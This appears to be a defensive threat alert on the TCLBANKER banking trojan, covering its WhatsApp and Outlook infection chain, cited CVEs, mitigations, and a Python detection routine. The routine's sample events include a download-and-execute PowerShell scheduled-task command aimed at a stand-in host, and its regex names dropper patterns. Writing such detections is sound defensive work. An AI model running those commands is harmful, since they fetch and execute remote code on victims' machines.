⚠️ THREAT ALERT: TCLBANKER Banking Trojan Targets Financial Platforms via WhatsApp and Outlook Worms
The campaign attributed to the TCLBANKER banking trojan uses a multi‑stage delivery chain built on social engineering native to WhatsApp and Microsoft Outlook. Initial infection begins with a malicious WhatsApp “document” (typically a PDF or ZIP archive) that masquerades as a legitimate invoice or payment confirmation. The attachment carries a UPX‑packed DLL whose embedded payload is encrypted with a custom RC4 routine. On execution, the DLL drops a PowerShell script that uses Windows Management Instrumentation (WMI) to register a scheduled task for persistence. In parallel, an Outlook worm component is distributed through spear‑phishing emails carrying a .docm file with a malicious VBA macro; the macro calls CreateObject("WScript.Shell") to download the same trojan binary from a hard‑coded HTTPS URL. The worm then enumerates the victim’s address book and propagates to contacts both through WhatsApp’s “Share” feature (reportedly via the WhatsApp Business API) and through Outlook auto‑forward rules, creating a self‑replicating infection loop across two of the most widely used communication platforms.
TCLBANKER’s core banking module is reported to exploit known vulnerabilities in widely used software to harvest credentials and conduct unauthorized transactions. Preliminary reverse engineering indicates reliance on CVE‑2023‑23397, which the report describes as Outlook remote code execution used to inject malicious COM objects into the Outlook process without user prompts. That description does not match the vulnerability as publicly documented: CVE‑2023‑23397 is an Outlook elevation‑of‑privilege flaw in which a crafted calendar item’s PidLidReminderFileParameter property points to an attacker‑controlled UNC path, so Outlook leaks the user’s Net‑NTLMv2 hash when the reminder fires; it provides no code‑execution primitive. Treat the claimed COM‑injection use as unverified. The report further cites CVE‑2024‑21848 (described there as a WhatsApp Desktop arbitrary file write) to plant a malicious JAR in the WhatsApp installation directory, which the trojan’s loader later executes via “java -jar”; this step presupposes a Java runtime on the host. The payload also incorporates a WebView2 hooking technique that intercepts HTTPS traffic to banking portals, extracting one‑time passwords and session cookies. Together these capabilities are said to let TCLBANKER keep a low profile while exfiltrating high‑value financial data and automating fraudulent transfers without elevated system privileges.
Mitigation requires defense in depth across both user hygiene and hardening of the software stack. Organizations should enforce strict macro execution policies in Microsoft Office (block macros in files that arrived from the Internet), disable automatic download of external content in Outlook, and apply the Outlook security update for CVE‑2023‑23397 together with related Outlook hardening advisories; Microsoft’s published CVE‑2023‑23397 audit script can also be run against mailboxes to find items whose reminder‑file property is populated, which surfaces past exploitation attempts. On the client side, the report states that WhatsApp Desktop must be updated to version 2.24.14 or later, which it says mitigates CVE‑2024‑21848 by disabling the vulnerable file‑write path; confirm this against WhatsApp’s own release notes before relying on it. Endpoint and network defenders should deploy detections for PowerShell launched with hidden windows or encoded commands, for Office applications spawning script hosts, and for unusual scheduled‑task creation (Security event 4698, or schtasks.exe running under WmiPrvSE.exe), together with DNS‑level blocking of C2 domains associated with TCLBANKER. Finally, enforce multi‑factor authentication on all banking portals and deploy transaction‑monitoring rules that flag anomalous geographic or device patterns. Because the WebView2 hooking module captures one‑time passwords and session cookies inside the browser, SMS or app‑generated OTP codes alone give limited protection; phishing‑resistant MFA (FIDO2/WebAuthn) and step‑up re‑authentication for high‑value transfers are what actually limit the impact of this class of credential theft.
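As an added example, not taken from the original alert or from the cited report, the following Python triage routine applies the endpoint detections recommended above to constructed Sysmon‑style process‑creation events and Windows Security 4698 scheduled‑task events. The event shapes, field names, task names and command lines are assumptions made for illustration; a real deployment would map them from the SIEM’s normalized schema.

```python
import re
import ntpath

# Constructed sample telemetry for illustration only (not real campaign data).
# "id" 1 models a Sysmon process-creation event; "id" 4698 models the Windows
# Security "A scheduled task was created" event. Field names are simplified.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"id": 1, "parent": "WmiPrvSE.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /Create /SC ONLOGON /TN "Updater" '
                '/TR "powershell -w hidden -c iex (New-Object Net.WebClient).DownloadString(\'https://example.invalid/p\')"'},
    {"id": 4698, "task_name": "\\Updater",
     "command": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "arguments": "-w hidden -ExecutionPolicy Bypass -File C:\\Users\\Public\\u.ps1"},
    {"id": 4698, "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe", "arguments": "-c -h -k -g -$"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# Flags and cmdlets that are rare in legitimate interactive use but routine in
# droppers: encoded commands, hidden windows, no profile, policy bypass,
# download-and-evaluate.
SUSPICIOUS_PS = re.compile(
    r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s"
    r"|(?:^|\s)-w(?:indowstyle)?\s+hidden"
    r"|(?:^|\s)-nop\b"
    r"|(?:^|\s)-(?:ep|executionpolicy)\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|frombase64string",
    re.IGNORECASE,
)


def is_suspicious_powershell(cmdline: str) -> bool:
    """True if a command line mentions PowerShell and carries dropper-style flags."""
    return "powershell" in cmdline.lower() and bool(SUSPICIOUS_PS.search(cmdline))


def triage(events):
    """Return (event_index, rule_name) pairs for events matching the alert's TTPs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:
            parent, image = ev["parent"].lower(), ev["image"].lower()
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                # Macro -> WScript.Shell / PowerShell child of an Office process.
                findings.append((i, "office-spawned-script-host"))
            if is_suspicious_powershell(ev["cmdline"]):
                findings.append((i, "suspicious-powershell-flags"))
            if parent == "wmiprvse.exe" and image == "schtasks.exe":
                # Persistence registered through WMI shows up under WmiPrvSE.exe.
                findings.append((i, "wmi-spawned-schtasks"))
        elif ev["id"] == 4698:
            # Task actions are Windows paths; ntpath splits on backslashes on any OS.
            action = ntpath.basename(ev["command"]).lower()
            if action in SCRIPT_HOSTS or SUSPICIOUS_PS.search(ev["arguments"]):
                findings.append((i, "scheduled-task-runs-script-host"))
    return findings


def summarize(findings):
    """Count hits per rule, the shape a SIEM alert or daily report would want."""
    counts = {}
    for _, rule in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for idx, rule in hits:
        print(f"event[{idx}] {rule}")
    print(summarize(hits))
```

The benign events (an administrator’s `-File` backup script and the built‑in ScheduledDefrag task) produce no findings, while the Office‑spawned encoded PowerShell, the WMI‑launched schtasks registration and the hidden‑window task action each fire; tune `OFFICE_APPS`, `SCRIPT_HOSTS` and the flag regex to the environment’s baseline before alerting on them.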